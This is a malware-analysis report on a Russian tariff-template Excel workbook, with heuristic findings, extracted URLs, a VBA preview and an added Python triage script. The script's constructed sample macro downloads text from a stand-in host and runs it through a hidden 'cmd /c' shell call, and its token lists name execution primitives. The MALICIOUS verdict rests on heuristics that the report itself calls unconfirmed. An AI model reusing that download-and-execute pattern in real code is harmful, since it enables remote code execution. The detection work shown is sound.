Verdict: MALICIOUS
Risk score: 182
Malware Insights
MITRE ATT&CK: T1203 Exploitation for Client Execution; T1059.005 Command and Scripting Interpreter: Visual Basic
The file is classified as malicious on two grounds. First, the MSCOMCTL.ListView signature that the analyzer associates with CVE-2012-0158 (a buffer overflow in the MSCOMCTL.OCX ActiveX control, patched in MS12-027) matched; the heuristic itself is labelled "CVE likely", so the match identifies the vulnerable control class in the document, not a confirmed exploit body. Second, the workbook carries VBA with a Workbook_Open handler, so macro code runs as soon as the document is opened (subject to the macro security setting), and the macro source contains a CreateObject call. The analyzer's reading is that the macro downloads and executes a second-stage payload: the p-code heuristic found an auto-execution token together with shell/download/object-execution tokens (XMLHTTP usage) in the same compiled stream, and the document embeds several https://.../procwsxls/ endpoints. A practitioner should confirm this against the extracted source rather than the heuristics alone: in the preview below, Workbook_Open only calls modUpdTemplMain.Check_Update_Execution, and only when a checkbox on the "Обновление" (Update) sheet is set; the procwsxls URLs are the hard-coded base URLs in modHTTPServerCaller; and the CreateObject call does not fall within the previewed portion of the 194 KB source, so the download-and-execute path still has to be traced through the full macros.bas.
Heuristics (6)

- MSCOMCTL.ListView — CVE-2012-0158 [high; CVE likely] (CVE_2012_0158): MSCOMCTL.ListView control associated with CVE-2012-0158.
- VBA macros detected [medium; 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- Workbook_Open macro [high] (OLE_VBA_WBOPEN): Workbook_Open macro.
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call.
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

All 27 extracted URLs were labelled "In document text (OLE body)"; none was attributed to the macro, JS or link-annotation channel. Several were carved with trailing non-printable bytes; those bytes are stripped here and repeated URLs are collapsed, with the number of raw occurrences in parentheses. The four https .../procwsxls/ hosts are exactly the STR_HTTP_REQUEST_BASE_URL_1..4 constants in the extracted modHTTPServerCaller module.

- http://www.fstrf.ru/regions/region/showlist (2)
- http://support.eias.ru/index.php?a=add&catid=5
- http://eias.ru/?page=show_templates (2; one copy extracted with a trailing "7")
- http://eias.ru/files/distr/libs_for_templates_setup.rar
- http://www.imagemagick.org (3)
- https://tariff.eias.ru/procwsxls/ (2)
- https://appsrv02.eias.ru/procwsxls/ (2)
- https://appsrv01.eias.ru/procwsxls/
- https://eias.fstrf.ru/procwsxls/ (3)
- http://commons.wikimedia.org/wiki/File:Flag_of_Bryansk_Oblast.png
- http://commons.wikimedia.org/wiki/File:Flag_of_Kursk_Oblast.png
- http://commons.wikimedia.org/wiki/File:Coat_of_Arms_of_Pskov_oblast.png
- http://commons.wikimedia.org/wiki/File:Flag_of_Ivanovo_Oblast.png
- http://commons.wikimedia.org/wiki/File:Baikonur_seal.png
- http://commons.wikimedia.org/wiki/File:Flag_of_Saratov_Oblast.png
- http://commons.wikimedia.org/wiki/File:Flag_of_Yaroslavl_Oblast.png
- http://commons.wikimedia.org/wiki/File:Flag_of_Kostroma_oblast.gif
- http://commons.wikimedia.org/wiki/File:Flag_of_Ryazan_Oblast.png
- http://commons.wikimedia.org/wiki/File:Flag_of_Moscow_Oblast.png
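The two heuristics that carry most of the verdict (the p-code auto-exec/execution-token co-occurrence and the MSCOMCTL.ListView match) are simple enough to reproduce and, more usefully, to tighten. The script below is an added example written for this page; it is not the analyzer's or oletools' code. It re-implements the stream-level token co-occurrence check, then adds a stricter variant that follows calls from the auto-exec handler through the extracted source to see whether the entry point actually reaches a download/execute primitive (the question left open by this report's preview), and a CLSID presence test for the ListView control. The token lists, the ListView CLSID value (taken from public CVE-2012-0158 signatures; verify it against your own signature set), the sample VBA source and the sample OLE stream are all assumptions constructed for the example.

```python
"""Static triage of the VBA / OLE findings described in this report.

Added example, not the analyzer's or oletools' code. All sample data is
constructed; the token lists and the CLSID value are assumptions.
"""
import re
import uuid

AUTOEXEC_TOKENS = ("Workbook_Open", "Auto_Open", "Document_Open",
                   "AutoOpen", "AutoExec", "Workbook_Activate")
EXEC_TOKENS = ("Shell", "ShellExecute", "CreateObject", "GetObject",
               "WScript.Shell", "XMLHTTP", "URLDownloadToFile", "Run")

# MSCOMCTL ListViewCtrl CLSID as used in public CVE-2012-0158 signatures
# (assumption: confirm against your own signature set before relying on it).
LISTVIEW_CLSID = uuid.UUID("BDD1F04B-858B-11D1-B16A-00C0F0283628")


def _token_re(tokens):
    """Case-insensitive (VBA is), longest alternative first, bounded by
    non-word characters so 'Shell' is not counted inside 'ShellExecute'."""
    alts = "|".join(re.escape(t) for t in sorted(tokens, key=len, reverse=True))
    return re.compile(rf"(?<!\w)(?:{alts})(?!\w)", re.IGNORECASE)


def _hits(text, tokens):
    canon = {t.lower(): t for t in tokens}
    return sorted({canon[m.group(0).lower()] for m in _token_re(tokens).finditer(text)})


def scan_stream(data: bytes) -> dict:
    """Stream-level heuristic (the report's OLE_VBA_PCODE_AUTOEXEC_EXEC idea):
    an auto-exec token and an execution token present in the same blob. Works on
    decoded source or any stream where identifier names survive as plain
    strings; NULs are dropped so UTF-16 copies of ASCII names are seen too."""
    text = data.decode("latin-1") + "\n" + data.replace(b"\x00", b"").decode("latin-1")
    auto, execs = _hits(text, AUTOEXEC_TOKENS), _hits(text, EXEC_TOKENS)
    return {"autoexec": auto, "exec": execs, "fires": bool(auto and execs)}


_PROC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\([^\n]*\n"
    r"(.*?)^[ \t]*End\s+(?:Sub|Function)",
    re.IGNORECASE | re.DOTALL | re.MULTILINE)


def procedures(source: str) -> dict:
    """Procedure name -> body for modules concatenated into one source file.
    A module prefix on a call (modUpd.Foo) is ignored when resolving."""
    return dict(_PROC_RE.findall(source))


def handler_reach(source: str, max_depth: int = 5) -> dict:
    """For each auto-execution handler, follow calls to other procedures and
    list the execution tokens reachable as [(procedure, token), ...]. This
    separates 'both tokens occur somewhere in the module' from 'the entry
    point reaches a download/execute primitive'."""
    procs = procedures(source)
    auto = {t.lower() for t in AUTOEXEC_TOKENS}
    exec_re, canon = _token_re(EXEC_TOKENS), {t.lower(): t for t in EXEC_TOKENS}
    reach = {}
    for entry in (n for n in procs if n.lower() in auto):
        chain, seen, todo = [], set(), [(entry, 0)]
        while todo:
            cur, depth = todo.pop(0)  # breadth-first: shortest call path first
            if cur.lower() in seen or depth > max_depth:
                continue
            seen.add(cur.lower())
            body = procs[cur]
            chain += [(cur, canon[m.group(0).lower()]) for m in exec_re.finditer(body)]
            for other in procs:  # a call is a bare reference to another procedure
                if other.lower() != cur.lower() and re.search(
                        rf"(?<!\w){re.escape(other)}(?!\w)", body, re.IGNORECASE):
                    todo.append((other, depth + 1))
        reach[entry] = chain
    return reach


def has_listview_control(data: bytes) -> bool:
    """CVE-2012-0158 triage: the ListView CLSID as a 16-byte little-endian GUID
    (OLE storage) or spelled out in text (RTF objdata hex, XML). A hit
    identifies the vulnerable control class, not an exploit; the report's own
    label is 'CVE likely', and templates use this control legitimately."""
    low = data.lower()
    return (LISTVIEW_CLSID.bytes_le in data
            or LISTVIEW_CLSID.hex.encode() in low
            or str(LISTVIEW_CLSID).encode() in low)


# Constructed VBA source mirroring the shape of this report's preview: the
# auto-exec handler hands off to an update routine in another module.
SAMPLE_SOURCE = '''\
Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    ThisWorkbook.CustomDocumentProperties("Status") = 1
    If Me.Worksheets("Update").chkGetUpdates.Value = True Then
        modUpdTemplMain.Check_Update_Execution Me
    End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
    MsgBox "Template saved", vbInformation
End Sub

Attribute VB_Name = "modUpdTemplMain"
Public Sub Check_Update_Execution(wb As Workbook)
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "https://example.invalid/procwsxls/update", False
    http.send
    ApplyUpdate wb, http.responseText
End Sub

Public Sub ApplyUpdate(wb As Workbook, payload As String)
    Shell "cmd /c " & payload, vbHide
End Sub
'''

# Constructed stand-in for an OLE control stream carrying the ListView CLSID.
SAMPLE_STREAM = b"\x00" * 16 + LISTVIEW_CLSID.bytes_le + b"MSComctlLib.ListViewCtrl.2\x00"

if __name__ == "__main__":
    print(scan_stream(SAMPLE_SOURCE.encode()))
    for handler, chain in handler_reach(SAMPLE_SOURCE).items():
        print(handler, "->", chain)
    print("ListView CLSID present:", has_listview_control(SAMPLE_STREAM))
```

On the constructed source, scan_stream fires (Workbook_Open plus CreateObject/XMLHTTP/Shell in one blob), and handler_reach shows the path Workbook_Open -> Check_Update_Execution (CreateObject, XMLHTTP) -> ApplyUpdate (Shell). Run handler_reach over the real macros.bas to answer the question this report leaves open: whether the update routine called from Workbook_Open reaches an execution primitive, or only fetches data over the hard-coded procwsxls endpoints.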
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 194081 bytes | d313d3b59cd4b8d6dc5115d3f25b4123dc97315f51b987d68b17fda9273d9876 |
Preview: first 1,000 lines of the extracted script (cut short on this page). Russian comments are translated; string literals and sheet names are kept verbatim, with English glosses in added comments.

```vba
Attribute VB_Name = "ЭтаКнига"
' (module name "ЭтаКнига" = "ThisWorkbook")
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Const SAVE_STATUS_CRITICAL_IMPACT_WARNING As String = "Шаблон сохранен, но НЕ БУДЕТ ПРИНЯТ к рассмотрению из-за невыполнения ОБЯЗАТЕЛЬНЫХ условий. См. лист 'Проверка'!"
' EN: "Template saved, but WILL NOT BE ACCEPTED for review because MANDATORY conditions were not met. See the 'Проверка' (Check) sheet!"
Private Const SAVE_STATUS_SUCCESS As String = "Шаблон готов к сохранению без замечаний"
' EN: "Template is ready to be saved without remarks"
Private Const SAVE_STATUS_LOW_IMPACT_WARNING As String = "Шаблон будет принят к рассмотрению, но обратите внимание на сообщения на листе 'Проверка'"
' EN: "Template will be accepted for review, but note the messages on the 'Проверка' (Check) sheet"
Private Const SAVE_MESSAGE_TITLE As String = "Результат проверки"
' EN: "Check result"
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
' Exit Sub
Application.Calculate
Application.ReferenceStyle = xlA1
' If no region is selected there is nothing to check
If Len(CStr(Me.Names("region_name").RefersToRange.cells(1, 1).Value)) = 0 Then
Exit Sub
End If
modProv.WarningsBeforeSaving Me
If modGlobals.glngCriticalImpactWarningsCounter > 0 Then
Me.CustomDocumentProperties("Status") = 1 'ТРАНС
MsgBox SAVE_STATUS_CRITICAL_IMPACT_WARNING, vbCritical + vbOKOnly, SAVE_MESSAGE_TITLE
Me.Worksheets("Проверка").Activate
Me.Worksheets("Проверка").Range("A1").Select
ElseIf modGlobals.glngLowImpactWarningsCounter > 0 Then
Me.CustomDocumentProperties("Status") = 1 'ТРАНС
MsgBox SAVE_STATUS_LOW_IMPACT_WARNING, vbExclamation + vbOKOnly, SAVE_MESSAGE_TITLE
Me.Worksheets("Проверка").Activate
Me.Worksheets("Проверка").Range("A1").Select
Else 'ТРАНС
Me.CustomDocumentProperties("Status") = 2 'ТРАНС
MsgBox SAVE_STATUS_SUCCESS, vbInformation, SAVE_MESSAGE_TITLE
End If
On Error GoTo ErrHandler
Dim status As Integer
status = Me.CustomDocumentProperties("Status")
If status > 2 Then
' EN: "The document is signed with a digital signature (ЭЦП) and cannot be modified"
MsgBox "Документ подписан ЭЦП и не может быть изменен", vbExclamation + vbOKOnly, ThisWorkbook.name
Cancel = True
Exit Sub
End If
Exit Sub
ErrHandler:
MsgBox Err.Description, vbOKOnly + vbExclamation, ThisWorkbook.name
End Sub
Private Sub Workbook_Open()
ThisWorkbook.CustomDocumentProperties("Status") = 1 'ТРАНС
Application.Calculation = xlCalculationAutomatic ' so that formulas are recalculated automatically
' For updates
Dim wsSheet As Worksheet
For Each wsSheet In Me.Worksheets
If wsSheet.CodeName = "SHEET_UPDATE_INSTRUCTION" Then
' ("Обновление" = "Update" sheet)
If Me.Worksheets("Обновление").chkGetUpdates.Value = True Then
modUpdTemplMain.Check_Update_Execution Me
End If
End If
Next wsSheet
End Sub
Attribute VB_Name = "modHTTPServerCaller"
Option Explicit
Option Base 1
' For registries
Public Const STR_REESTR_TYPE As String = "REDU_Y"
Public Const STR_ACTIVITY_SPHERE As String = "EE"
Public Const STR_RANGE_NAME As String = "REESTR_ORG_RANGE"
Public Const STR_REESTR_SHEET_NAME As String = "REESTR_ORG"
Public Const STR_GTP_RANGE_NAME As String = "REESTR_GTP_RANGE"
Public Const STR_GTP_REESTR_SHEET_NAME As String = "REESTR_GTP"
' DNS addresses; they are polled in exactly this order
Public Const STR_HTTP_REQUEST_BASE_URL_1 As String = "https://tariff.eias.ru/procwsxls/"
Public Const STR_HTTP_REQUEST_BASE_URL_2 As String = "https://appsrv02.eias.ru/procwsxls/"
Public Const STR_HTTP_REQUEST_BASE_URL_3 As String = "https://appsrv01.eias.ru/procwsxls/" ' TBD
Public Const STR_HTTP_REQUEST_BASE_URL_4 As String = "https://eias.fstrf.ru/procwsxls/" ' TBD
Public Const STR_HTTP_REQUEST_PROC_MR_MO_OKTMO_NAME As String = "MO_REESTR?"
Public Const STR_HTTP_REQUEST_PROC_MR_MO_OKTMO_PARAM_1 As String = "p_NSRF="
Public Const STR_HTTP_REQUEST_PROC_MR_MO_OKTMO_PARAM_2 As String = "p_TC="
Public Const STR_HTTP_REQUEST_PROC_FIAS_NAME As String = "GET_FIAS_STREETS?"
Public Const STR_HTTP_REQU
```
... (truncated)